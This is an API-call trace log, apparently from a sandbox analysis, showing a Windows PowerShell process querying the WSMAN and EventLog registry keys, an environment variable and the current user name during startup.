	[0789.553] RegEnumValueW (in: hKey=0x328, dwIndex=0x1, lpValueName=0x2e1ec0, lpcchValueName=0x16d628, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d628, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0789.553] CoTaskMemFree (pv=0x2e1ec0) 
	[0789.553] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0789.553] RegEnumValueW (in: hKey=0x328, dwIndex=0x2, lpValueName=0x2e1ec0, lpcchValueName=0x16d628, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d628, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0789.553] CoTaskMemFree (pv=0x2e1ec0) 
	[0789.554] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d60c, lpData=0x0, lpcbData=0x16d608*=0x0 | out: lpType=0x16d60c*=0x1, lpData=0x0, lpcbData=0x16d608*=0x8) returned 0x0
	[0789.554] CoTaskMemAlloc (cb=0xc) returned 0x356780
	[0789.554] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d5dc, lpData=0x356780, lpcbData=0x16d5d8*=0x8 | out: lpType=0x16d5dc*=0x1, lpData="2.0", lpcbData=0x16d5d8*=0x8) returned 0x0
	[0789.554] CoTaskMemFree (pv=0x356780) 
	[0790.673] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5c8 | out: phkResult=0x16d5c8*=0x318) returned 0x0
	[0790.673] RegQueryInfoKeyW (in: hKey=0x318, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d4cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d4c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d4cc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d4c8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0790.673] CoTaskMemFree (pv=0x0) 
	[0790.673] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0790.673] RegEnumValueW (in: hKey=0x318, dwIndex=0x0, lpValueName=0x2e1ec0, lpcchValueName=0x16d578, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d578, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0790.674] CoTaskMemFree (pv=0x2e1ec0) 
	[0790.674] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0790.674] RegEnumValueW (in: hKey=0x318, dwIndex=0x1, lpValueName=0x2e1ec0, lpcchValueName=0x16d578, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d578, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0790.674] CoTaskMemFree (pv=0x2e1ec0) 
	[0790.674] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0790.674] RegEnumValueW (in: hKey=0x318, dwIndex=0x2, lpValueName=0x2e1ec0, lpcchValueName=0x16d578, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d578, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0790.674] CoTaskMemFree (pv=0x2e1ec0) 
	[0790.674] RegQueryValueExW (in: hKey=0x318, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d55c, lpData=0x0, lpcbData=0x16d558*=0x0 | out: lpType=0x16d55c*=0x1, lpData=0x0, lpcbData=0x16d558*=0x8) returned 0x0
	[0790.674] CoTaskMemAlloc (cb=0xc) returned 0x356100
	[0790.674] RegQueryValueExW (in: hKey=0x318, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d52c, lpData=0x356100, lpcbData=0x16d528*=0x8 | out: lpType=0x16d52c*=0x1, lpData="2.0", lpcbData=0x16d528*=0x8) returned 0x0
	[0790.674] CoTaskMemFree (pv=0x356100) 
	[0790.676] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0790.676] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.676] CoTaskMemFree (pv=0x1b742240) 
	[0790.681] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0790.681] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.681] CoTaskMemFree (pv=0x1b742240) 
	[0790.687] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5f8 | out: phkResult=0x16d5f8*=0x330) returned 0x0
	[0791.486] RegQueryInfoKeyW (in: hKey=0x330, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d56c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d568, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d56c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d568*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.486] CoTaskMemFree (pv=0x0) 
	[0791.487] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.488] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x0, lpName=0x2e1ec0, lpcchName=0x16d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.488] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.488] CoTaskMemFree (pv=0x0) 
	[0791.488] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.488] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x1, lpName=0x2e1ec0, lpcchName=0x16d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.488] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.488] CoTaskMemFree (pv=0x0) 
	[0791.488] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.488] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x2, lpName=0x2e1ec0, lpcchName=0x16d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.488] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.488] CoTaskMemFree (pv=0x0) 
	[0791.488] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.488] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x3, lpName=0x2e1ec0, lpcchName=0x16d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.489] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.489] CoTaskMemFree (pv=0x0) 
	[0791.489] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.489] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x4, lpName=0x2e1ec0, lpcchName=0x16d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.489] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.489] CoTaskMemFree (pv=0x0) 
	[0791.489] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.489] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x5, lpName=0x2e1ec0, lpcchName=0x16d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.489] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.489] CoTaskMemFree (pv=0x0) 
	[0791.489] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.489] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x6, lpName=0x2e1ec0, lpcchName=0x16d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.489] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.489] CoTaskMemFree (pv=0x0) 
	[0791.489] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.490] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x7, lpName=0x2e1ec0, lpcchName=0x16d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.490] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.490] CoTaskMemFree (pv=0x0) 
	[0791.490] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.490] RegEnumKeyExW (in: hKey=0x330, dwIndex=0x8, lpName=0x2e1ec0, lpcchName=0x16d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.490] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.490] CoTaskMemFree (pv=0x0) 
	[0791.490] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x334) returned 0x0
	[0791.490] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x0) returned 0x2
	[0791.490] RegOpenKeyExW (in: hKey=0x330, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x338) returned 0x0
	[0791.490] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x0) returned 0x2
	[0791.490] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x33c) returned 0x0
	[0791.491] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x0) returned 0x2
	[0791.491] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x340) returned 0x0
	[0791.491] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x0) returned 0x2
	[0791.491] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x344) returned 0x0
	[0791.491] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x0) returned 0x2
	[0791.491] RegOpenKeyExW (in: hKey=0x330, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x348) returned 0x0
	[0791.491] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x0) returned 0x2
	[0791.491] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x34c) returned 0x0
	[0791.491] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x0) returned 0x2
	[0791.492] RegOpenKeyExW (in: hKey=0x330, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x350) returned 0x0
	[0791.492] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x0) returned 0x2
	[0791.492] RegOpenKeyExW (in: hKey=0x330, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x354) returned 0x0
	[0791.492] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x358) returned 0x0
	[0791.492] RegCloseKey (hKey=0x358) returned 0x0
	[0791.492] RegCloseKey (hKey=0x330) returned 0x0
	[0791.493] RegCloseKey (hKey=0x354) returned 0x0
	[0791.501] CoTaskMemAlloc (cb=0x804) returned 0x1b768af0
	[0791.501] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b768af0, nSize=0x16d868 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d868) returned 0x1
	[0791.503] CoTaskMemFree (pv=0x1b768af0) 
	[0791.504] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.504] GetUserNameW (in: lpBuffer=0x2e1ec0, pcbBuffer=0x16d8a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8a8) returned 1
	[0791.504] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.519] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5a8 | out: phkResult=0x16d5a8*=0x35c) returned 0x0
	[0791.520] RegQueryInfoKeyW (in: hKey=0x35c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d51c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d518, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d51c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d518*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.520] CoTaskMemFree (pv=0x0) 
	[0791.520] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.520] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x0, lpName=0x2e1ec0, lpcchName=0x16d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.520] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.520] CoTaskMemFree (pv=0x0) 
	[0791.520] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.520] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x1, lpName=0x2e1ec0, lpcchName=0x16d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.520] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.520] CoTaskMemFree (pv=0x0) 
	[0791.520] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.520] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x2, lpName=0x2e1ec0, lpcchName=0x16d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.520] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.520] CoTaskMemFree (pv=0x0) 
	[0791.520] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.521] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x3, lpName=0x2e1ec0, lpcchName=0x16d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.521] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.521] CoTaskMemFree (pv=0x0) 
	[0791.521] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.521] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x4, lpName=0x2e1ec0, lpcchName=0x16d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.521] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.521] CoTaskMemFree (pv=0x0) 
	[0791.521] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.521] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x5, lpName=0x2e1ec0, lpcchName=0x16d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.521] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.521] CoTaskMemFree (pv=0x0) 
	[0791.521] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.521] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x6, lpName=0x2e1ec0, lpcchName=0x16d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.521] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.522] CoTaskMemFree (pv=0x0) 
	[0791.522] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.522] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x7, lpName=0x2e1ec0, lpcchName=0x16d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.522] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.522] CoTaskMemFree (pv=0x0) 
	[0791.522] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.522] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x8, lpName=0x2e1ec0, lpcchName=0x16d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.522] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.522] CoTaskMemFree (pv=0x0) 
	[0791.522] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x360) returned 0x0
	[0791.522] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x0) returned 0x2
	[0791.522] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x364) returned 0x0
	[0791.523] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x0) returned 0x2
	[0791.523] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x368) returned 0x0
	[0791.523] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x0) returned 0x2
	[0791.523] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x36c) returned 0x0
	[0791.523] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x0) returned 0x2
	[0791.523] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x370) returned 0x0
	[0791.523] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x0) returned 0x2
	[0791.524] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x374) returned 0x0
	[0791.524] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x0) returned 0x2
	[0791.524] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x378) returned 0x0
	[0791.524] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x0) returned 0x2
	[0791.524] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x37c) returned 0x0
	[0791.524] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x0) returned 0x2
	[0791.524] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x380) returned 0x0
	[0791.525] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x384) returned 0x0
	[0791.525] RegCloseKey (hKey=0x384) returned 0x0
	[0791.525] RegCloseKey (hKey=0x35c) returned 0x0
	[0791.525] RegCloseKey (hKey=0x380) returned 0x0
	[0791.526] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5a8 | out: phkResult=0x16d5a8*=0x380) returned 0x0
	[0791.526] RegQueryInfoKeyW (in: hKey=0x380, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d51c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d518, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d51c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d518*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.526] CoTaskMemFree (pv=0x0) 
	[0791.526] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.526] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x0, lpName=0x2e1ec0, lpcchName=0x16d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.526] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.526] CoTaskMemFree (pv=0x0) 
	[0791.526] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.527] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x1, lpName=0x2e1ec0, lpcchName=0x16d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.527] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.527] CoTaskMemFree (pv=0x0) 
	[0791.527] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.527] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x2, lpName=0x2e1ec0, lpcchName=0x16d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.527] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.527] CoTaskMemFree (pv=0x0) 
	[0791.527] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.527] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x3, lpName=0x2e1ec0, lpcchName=0x16d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.527] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.527] CoTaskMemFree (pv=0x0) 
	[0791.527] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.527] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x4, lpName=0x2e1ec0, lpcchName=0x16d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.527] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.527] CoTaskMemFree (pv=0x0) 
	[0791.528] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.528] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x5, lpName=0x2e1ec0, lpcchName=0x16d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.528] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.528] CoTaskMemFree (pv=0x0) 
	[0791.528] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
